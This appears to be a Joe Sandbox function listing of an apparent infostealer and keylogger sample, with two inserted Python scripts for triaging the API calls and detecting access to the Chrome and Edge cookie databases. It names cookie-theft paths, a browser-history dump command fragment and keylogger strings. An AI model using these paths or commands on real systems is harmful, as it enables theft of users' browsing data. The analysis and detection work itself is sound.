                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 0-263838557
                                                                                                                                                • Opcode ID: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                • Instruction ID: da8fb74aa53f7b39327717419ea6793f6800af9799f3d5c2cf6102f7e15971fb
                                                                                                                                                • Opcode Fuzzy Hash: 5e00ae4c16f04a5a408ad6ef1dd4f82ff0aaed16414488ba1079334ecebbb015
                                                                                                                                                • Instruction Fuzzy Hash: 1451C171D00209AAEF109FA5D885BAFBBB8EF45314F14015FE905A7291CB38D911CBA9
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountEventTick
                                                                                                                                                • String ID: !D@$NG
                                                                                                                                                • API String ID: 180926312-2721294649
                                                                                                                                                • Opcode ID: 9995513762a4fd8edc495be866afed25eb4c32c1f3911c48c384adcc3b5f66be
                                                                                                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                                                                • Opcode Fuzzy Hash: 9995513762a4fd8edc495be866afed25eb4c32c1f3911c48c384adcc3b5f66be
                                                                                                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
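The "APIs" blocks above are the part of this listing a triager actually reads: the process walk (CreateToolhelp32Snapshot / Process32FirstW / Process32NextW with OpenProcess in subcalls) and the CreateFileW / SetFilePointer / WriteFile sequence are behaviours, the hashes are not. The script below is an added example, not Joe Sandbox code or anything from the sample: it parses the "• Name.MODULE(args), ref: addr" lines in the format shown on this page, decodes the OpenProcess access masks, CreateFileW access and disposition values and the SetFilePointer move method using the documented Windows SDK constants, and reports the behaviours per function. The three records embedded as input are copied from this listing; the rule names and the assumption that a record runs from an "APIs" line to its "• API ID:" line are mine.

```python
"""Triage the per-function 'APIs' records of a Joe Sandbox function listing.

Added example for this report, not Joe Sandbox code: parses the
'• Name.MODULE(args), ref: addr' lines, decodes a few Windows SDK constants
(PROCESS_* access masks, GENERIC_*, creation dispositions, FILE_END) and
flags the behaviours a triager looks for first.  Record boundaries and rule
wording are assumptions made for this example."""
import re
from dataclasses import dataclass, field

# Constructed input: three records copied from the listing above.
SAMPLE = """\
APIs
  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
• Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
• CloseHandle.KERNEL32(00000000), ref: 0040FB40
  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
Memory Dump Source
• API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
• _free.LIBCMT ref: 0044F43F
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
Memory Dump Source
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
• WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
Memory Dump Source
• API ID: File$CloseHandle$CreatePointerWrite
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE, optional "(args)", then "ref: addr".  Args may be "?" or text.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")

# Windows SDK constants used for decoding (documented values).
PROCESS_ACCESS = {0x1: "PROCESS_TERMINATE", 0x8: "PROCESS_VM_OPERATION",
                  0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE",
                  0x400: "PROCESS_QUERY_INFORMATION",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}


@dataclass
class Call:
    name: str
    module: str
    args: list
    ref: str
    subcall: bool


@dataclass
class Record:
    label: str = ""
    calls: list = field(default_factory=list)


def parse_records(text):
    """Split the listing into records: 'APIs' header up to its '• API ID:' line."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        if line.startswith("• API ID:"):
            current.label = line.split(":", 1)[1].strip()
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            current.calls.append(Call(m.group("name"), m.group("module"), args,
                                      m.group("ref"), m.group("sub") is not None))
    return records


def arg_value(call, index):
    """Integer value of argument `index`, or None when the report shows '?' or text."""
    if index >= len(call.args):
        return None
    try:
        return int(call.args[index], 16)
    except ValueError:
        return None


def decode_flags(value, table):
    """Render a bitmask with the names in `table`; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def triage(record):
    """Behaviour findings for one function record (only the leading documented
    parameters are decoded: Joe Sandbox appends extra stack values after them)."""
    names = {c.name for c in record.calls}
    findings = []
    if "CreateToolhelp32Snapshot" in names and names & {"Process32NextW", "Process32Next"}:
        masks = set()
        for c in record.calls:
            if c.name == "OpenProcess" and arg_value(c, 0) is not None:
                masks.add(decode_flags(arg_value(c, 0), PROCESS_ACCESS))
        text = "process enumeration via Toolhelp32"
        if masks:
            text += ", opens processes with " + ", ".join(sorted(masks))
        findings.append(text)
    for c in record.calls:
        if c.name in ("CreateFileW", "CreateFileA"):
            access, disp = arg_value(c, 1), arg_value(c, 4)   # dwDesiredAccess, dwCreationDisposition
            if access is not None and access & 0x40000000 and "WriteFile" in names:
                mode = [decode_flags(access, GENERIC)]
                if disp in DISPOSITION:
                    mode.append(DISPOSITION[disp])
                seeks = [MOVE_METHOD.get(arg_value(s, 3), "?")   # dwMoveMethod
                         for s in record.calls if s.name == "SetFilePointer"]
                if "FILE_END" in seeks:
                    mode.append("seeks to FILE_END before WriteFile")
                findings.append("file write: " + ", ".join(mode))
    return findings


def triage_text(text):
    """Map each record's 'API ID' label to its findings (empty list = nothing flagged)."""
    return {r.label: triage(r) for r in parse_records(text)}


if __name__ == "__main__":
    for label, found in triage_text(SAMPLE).items():
        print(label, "->", found or "nothing flagged")
```

The access masks are worth reading rather than just noting the OpenProcess call: 0x400 and 0x1000 are query-only rights, so this function walks the process list and inspects entries (the sort of loop used to find analysis tools or a target name) rather than terminating or injecting; a 0x1 (PROCESS_TERMINATE) or 0x20 (PROCESS_VM_WRITE) mask in the same loop would change the reading. Two caveats apply to any rule written over these lines: the argument values are what the static analyser recovered from the dump, not observed runtime values, and "?" means unresolved, so a rule should never treat a missing value as zero.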
                                                                                                                                                APIs
                                                                                                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                                                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                                                                • String ID: XQG$NG$PG
                                                                                                                                                • API String ID: 1634807452-3565412412
                                                                                                                                                • Opcode ID: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                                                                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                                                                • Opcode Fuzzy Hash: fd0e2637303639c3914413e18f481dca8088ebaee1bdd9cde4e16d3ac9440c52
                                                                                                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LdSbZG1iH6.exe,00000104), ref: 00443515
                                                                                                                                                • _free.LIBCMT ref: 004435E0
                                                                                                                                                • _free.LIBCMT ref: 004435EA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                • String ID: C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                                • API String ID: 2506810119-2717834789
                                                                                                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                APIs
                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BBFE,?,00000000,FF8BC35D), ref: 0044B952
                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B980
                                                                                                                                                • GetLastError.KERNEL32 ref: 0044B9B1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                                • String ID: PkGNG
                                                                                                                                                • API String ID: 2456169464-263838557
                                                                                                                                                • Opcode ID: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                                                                                                                • Instruction ID: 31ac96f82a5847659344ef20b41dc67af7a50504b34fbd786f6314a6cc22fa3b
                                                                                                                                                • Opcode Fuzzy Hash: f851102e1cc74a1ce765c461dca65e8698d1b877b070f44673effa5d02d51bb5
                                                                                                                                                • Instruction Fuzzy Hash: B13161B5A102199FDB14CF59DD819EAB7B9FB08305F0444BEE90AD7251D734ED80CBA4
                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                                                                • API String ID: 368326130-3219657780
                                                                                                                                                • Opcode ID: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                                                                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                                                                • Opcode Fuzzy Hash: e78c06b9bf7766e7fe0f8007d50d57f34ca1e93f8206c7928855f49078e072bb
                                                                                                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                                                                APIs
                                                                                                                                                • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                                                                                                  • Part of subcall function 004138B2: RegCloseKey.KERNELBASE(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                                                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcslen$CloseCreateValue
                                                                                                                                                • String ID: !D@$okmode$PG
                                                                                                                                                • API String ID: 3411444782-3370592832
                                                                                                                                                • Opcode ID: daa606be5f890dd41bf4520ea31fc1fcd77c876229317bee2e8551f29a719760
                                                                                                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                                                                • Opcode Fuzzy Hash: daa606be5f890dd41bf4520ea31fc1fcd77c876229317bee2e8551f29a719760
                                                                                                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                                                                Strings
                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                • API String ID: 1174141254-1980882731
                                                                                                                                                • Opcode ID: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                                                                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                • Opcode Fuzzy Hash: 94e3019874633fdbfa545aa7663ce5ff9a408d6cc8816db895689c957fef93bc
                                                                                                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                                                                Strings
                                                                                                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                • API String ID: 1174141254-1980882731
                                                                                                                                                • Opcode ID: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                                                                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                • Opcode Fuzzy Hash: cd02b2d6f0091136f3bd33ffae0826dfdd9dcae469dd48ae7039cc879f52ebfc
                                                                                                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
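The two functions above probe the Chromium cookie databases: a parent call first checks that `\AppData\Local\Google\Chrome\` (or `\AppData\Local\Microsoft\Edge\`) exists, then `PathFileExistsW` is called on `User Data\Default\Network\Cookies` and on the `User Data\Profile ?\Network\Cookies` pattern for additional profiles. The Python below is an added example for defenders, not code from this report or from the sample: it enumerates the same candidate paths the sample would test, and runs a small detection over constructed Sysmon-style events (process image plus target path or command line) that flags a non-browser process opening one of those cookie databases and a command line carrying the `/sort "Visit Time" /stext "` string listed under the earlier function. The event shape, the process names and the assumption that `?` is filled in with a numeric profile index are all assumptions of the example; `chrome.exe` and `msedge.exe` are treated as the only legitimate readers.

```python
import re

# Browser data roots relative to %LOCALAPPDATA%, as probed by the sample
# (assumption: the sample formats "Profile ?" with a numeric index).
BROWSER_ROOTS = (r"Google\Chrome", r"Microsoft\Edge")


def candidate_cookie_paths(local_appdata, max_profiles=5):
    """Return the cookie DB paths a Remcos-style harvester would test with
    PathFileExistsW: Default first, then Profile 1..max_profiles."""
    paths = []
    for root in BROWSER_ROOTS:
        base = rf"{local_appdata}\{root}\User Data"
        paths.append(rf"{base}\Default\Network\Cookies")
        for n in range(1, max_profiles + 1):
            paths.append(rf"{base}\Profile {n}\Network\Cookies")
    return paths


# Regex derived from the two strings in the report; \d+ stands in for "?".
COOKIE_DB_RE = re.compile(
    r"\\AppData\\Local\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\"
    r"(Default|Profile \d+)\\Network\\Cookies$",
    re.IGNORECASE,
)

# Literal command-line fragment found in the sample's strings.
HISTORY_DUMP_RE = re.compile(r'/sort "Visit Time" /stext "', re.IGNORECASE)

# Processes allowed to open their own cookie databases (assumption).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Scan Sysmon-like event dicts and return (rule, image, detail) hits."""
    hits = []
    for ev in events:
        if ev["type"] == "file_access":
            if COOKIE_DB_RE.search(ev["target"]) and \
                    _basename(ev["image"]) not in BROWSER_IMAGES:
                hits.append(("cookie_db_access", ev["image"], ev["target"]))
        elif ev["type"] == "process_create":
            if HISTORY_DUMP_RE.search(ev["command_line"]):
                hits.append(("history_dump_cmdline", ev["image"], ev["command_line"]))
    return hits


# Constructed sample events (not taken from the sandbox run).
SAMPLE_EVENTS = [
    {"type": "file_access",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"type": "file_access",
     "image": r"C:\Users\user\Desktop\LdSbZG1iH6.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"type": "file_access",
     "image": r"C:\Users\user\Desktop\LdSbZG1iH6.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Profile 2\Network\Cookies"},
    {"type": "file_access",
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Bookmarks"},
    {"type": "process_create",
     "image": r"C:\Users\user\AppData\Local\Temp\bhv.exe",
     "command_line": r'bhv.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\h.txt"'},
    {"type": "process_create",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c dir"},
]

if __name__ == "__main__":
    for p in candidate_cookie_paths(r"C:\Users\user\AppData\Local", max_profiles=2):
        print("probe:", p)
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image} -> {detail}")
```

The path list is the same set of locations the sample checks, so it doubles as a hunting list for file-audit rules; the command-line rule matches only the literal fragment present in the sample's strings, and the `Bookmarks` event and `cmd.exe` line are left unflagged to show the rules do not fire on adjacent browser files or unrelated processes.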
                                                                                                                                                APIs
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2B8,004750F0,00000000,00000000), ref: 0040A239
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,004750F0,00000000,00000000), ref: 0040A249
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,004750F0,00000000,00000000), ref: 0040A255
                                                                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                                                                • String ID: Offline Keylogger Started
                                                                                                                                                • API String ID: 465354869-4114347211
                                                                                                                                                • Opcode ID: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                                                                                                                • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                                                                • Opcode Fuzzy Hash: 460aeebbd05c9109f8f1e9d4cf1c4a7c90257216c04fbe0fa29816e89daae231
                                                                                                                                                • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                                                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                • String ID: Online Keylogger Started
                                                                                                                                                • API String ID: 112202259-1258561607
                                                                                                                                                • Opcode ID: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                                                                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                • Opcode Fuzzy Hash: 77df2eb5e9a30333ff56a104ce6f74fac6c8f24925e0e44ba138bd3ce2eab701
                                                                                                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LocalTime
                                                                                                                                                • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                                                                                                                                • API String ID: 481472006-3277280411
                                                                                                                                                • Opcode ID: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                                                                                                                • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                • Opcode Fuzzy Hash: d9bff088cb76c426919b24c8266bea5d45f0a8ea700e32831e669085e32f1d03
                                                                                                                                                • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                APIs
                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                                                                                Strings
                                                                                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                                                                Memory Dump Source
